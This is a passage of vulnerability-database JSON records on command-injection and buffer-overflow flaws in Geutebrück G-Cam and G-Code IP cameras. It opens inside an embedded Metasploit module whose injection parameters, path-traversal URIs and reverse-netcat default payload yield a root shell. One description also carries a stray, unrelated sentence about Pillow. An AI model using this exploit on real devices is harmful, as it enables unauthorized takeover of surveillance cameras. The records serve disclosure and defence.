\u0027organizationunit\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027commonname\u0027 =\u003e Rex::Text.rand_text_alphanumeric(10..16),\n \u0027days\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027type\u0027 =\u003e Rex::Text.rand_text_numeric(2..4)\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/certmngr.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33548 - factory.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027preserve\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/factory.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33550 - language.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/language.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33551 - oem.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027set\u0027,\n \u0027enable\u0027 =\u003e \u0027yes\u0027,\n \u0027environment.lang\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/oem.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33552 - simple_reclistjs.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e {\n \u0027action\u0027 =\u003e \u0027get\u0027,\n \u0027timekey\u0027 =\u003e Rex::Text.rand_text_numeric(2..4),\n \u0027date\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027\n },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/simple_reclistjs.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33553 - testcmd.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027command\u0027 =\u003e \u0027PLACEHOLDER_CMD\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/testcmd.cgi\u0027\n }\n ],\n [\n \u0027CVE-2021-33554 - tmpapp.cgi\u0027, {\n \u0027http_method\u0027 =\u003e \u0027GET\u0027,\n \u0027http_vars\u0027 =\u003e { \u0027appfile.filename\u0027 =\u003e \u0027$(PLACEHOLDER_CMD)\u0027 },\n \u0027uri\u0027 =\u003e \u0027/../uapi-cgi/tmpapp.cgi\u0027\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [\u0027CRASH_SAFE\u0027],\n \u0027Reliability\u0027 =\u003e [\u0027REPEATABLE_SESSION\u0027],\n \u0027SideEffects\u0027 =\u003e [\u0027ARTIFACTS_ON_DISK\u0027]\n }\n )\n )\n end\n\n def firmware\n res = send_request_cgi(\n \u0027method\u0027 =\u003e \u0027GET\u0027,\n \u0027uri\u0027 =\u003e \u0027/brand.xml\u0027\n )\n unless res\n print_error(\u0027Connection failed!\u0027)\n return false\n end\n\n unless res\u0026.body \u0026\u0026 !res.body.empty?\n print_error(\u0027Empty body in the response!\u0027)\n return false\n end\n\n res_xml = res.get_xml_document\n if res_xml.at(\u0027//firmware\u0027).nil?\n print_error(\u0027Target did not respond with a XML document containing the \"firmware\" element!\u0027)\n return false\n end\n raw_text = res_xml.at(\u0027//firmware\u0027).text\n if raw_text \u0026\u0026 raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)\n raw_text.match(/\\d\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}/)[0]\n else\n print_error(\u0027Target responded with a XML document containing the \"firmware\" element but its not a valid version string!\u0027)\n false\n end\n end\n\n def check\n version = firmware\n if version == false\n return CheckCode::Unknown(\u0027Target did not respond with a valid XML response that we could retrieve the version from!\u0027)\n end\n\n rex_version = Rex::Version.new(version)\n vprint_status(\"Found Geutebruck version #{rex_version}\")\n if rex_version \u003c= Rex::Version.new(\u00271.12.0.27\u0027) || rex_version == Rex::Version.new(\u00271.12.13.2\u0027) || rex_version == Rex::Version.new(\u00271.12.14.5\u0027)\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n print_status(\"#{rhost}:#{rport} - Setting up request...\")\n\n method = target[\u0027http_method\u0027]\n if method == \u0027GET\u0027\n http_method_vars = \u0027vars_get\u0027\n else\n http_method_vars = \u0027vars_post\u0027\n end\n\n http_vars = target[\u0027http_vars\u0027]\n http_vars.each do |(k, v)|\n if v.include? \u0027PLACEHOLDER_CMD\u0027\n http_vars[k][\u0027PLACEHOLDER_CMD\u0027] = payload.encoded\n end\n end\n\n print_status(\"Sending CMD injection request to #{rhost}:#{rport}\")\n send_request_cgi(\n {\n \u0027method\u0027 =\u003e method,\n \u0027uri\u0027 =\u003e target[\u0027uri\u0027],\n http_method_vars =\u003e http_vars\n }\n )\n print_status(\u0027Exploit complete, you should get a shell as the root user!\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-33553"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "VULMON",
"id": "CVE-2021-33553"
},
{
"db": "PACKETSTORM",
"id": "164036"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-33553",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-03",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164036",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU97817785",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-208-05",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2021090031",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021072807",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2550",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021041363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-33553",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33553"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"id": "VAR-202109-0849",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T20:38:58.222000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GEUTEBRUCK \u2019 s\u00a0web\u00a0portal\u00a0 (Login required)",
"trust": 0.8,
"url": "https://portal.geutebrueck.com/"
},
{
"title": "Geutebr\u00fcck G-Cam E2 and G-Code Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=158063"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Stack-based buffer overflow (CWE-121) [ Other ]",
"trust": 0.8
},
{
"problemtype": " Lack of authentication for important features (CWE-306) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03"
},
{
"trust": 1.6,
"url": "https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu97817785/"
},
{
"trust": 0.8,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33553"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2550"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021072807"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021090031"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021041363"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33543"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
},
{
"trust": 0.1,
"url": "https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/\u0027],"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33544"
},
{
"trust": 0.1,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03\u0027]"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33554"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33551"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33548"
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "http://geutebruck.com\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33550"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33552"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33553"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "VULMON",
"id": "CVE-2021-33553"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2021-09-02T15:36:40",
"db": "PACKETSTORM",
"id": "164036"
},
{
"date": "2021-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2083"
},
{
"date": "2021-04-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2021-09-13T18:15:23.597000",
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-07-29T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"date": "2022-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202107-2083"
},
{
"date": "2021-04-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"date": "2023-11-07T03:35:52.310000",
"db": "NVD",
"id": "CVE-2021-33553"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "164036"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GEUTEBRUCK\u00a0 Made \u00a0G-Cam\u00a0E2\u00a0 and \u00a0G-Code\u00a0 Multiple vulnerabilities in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2083"
}
],
"trust": 0.6
}
}
VAR-202109-0600
Vulnerability from variot - Updated: 2025-01-30 20:36Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202109-0600",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2112",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2110",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2271",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ebc-2111",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2239",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2250",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2249",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2230",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-code een-2010",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2230",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam efd-2241",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2270",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ethc-2249",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code eec-2400",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam efd-2251",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ewpc-2270",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ewpc-2275",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ebc-2110",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2250",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam efd-2251",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-cam ethc-2240",
"scope": "lte",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.27"
},
{
"model": "g-code een-2040",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2112",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-cam ewpc-2271",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ebc-2111",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam ethc-2239",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * firmware 1.12.13.2 1.12.14.5"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* een-20xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* efd-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ethc-22xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-cam"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* eec-2xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "works with the above firmware s e2 series camera models encoders"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ebc-21xx"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "\u2025 * g-code"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "( multiple products )"
},
{
"model": "",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "* ewpc-22xx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
}
],
"trust": 0.6
},
"cve": "CVE-2021-33547",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-33547",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2021-33547",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-002023",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-33547",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "info@cert.vde.com",
"id": "CVE-2021-33547",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "OTHER",
"id": "JVNDB-2021-002023",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202104-975",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202107-2090",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-33547",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-33547"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-002023"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-975"
},
{
"db": "CNNVD",
"id": "CNNVD-202107-2090"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
},
{
"db": "NVD",
"id": "CVE-2021-33547"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
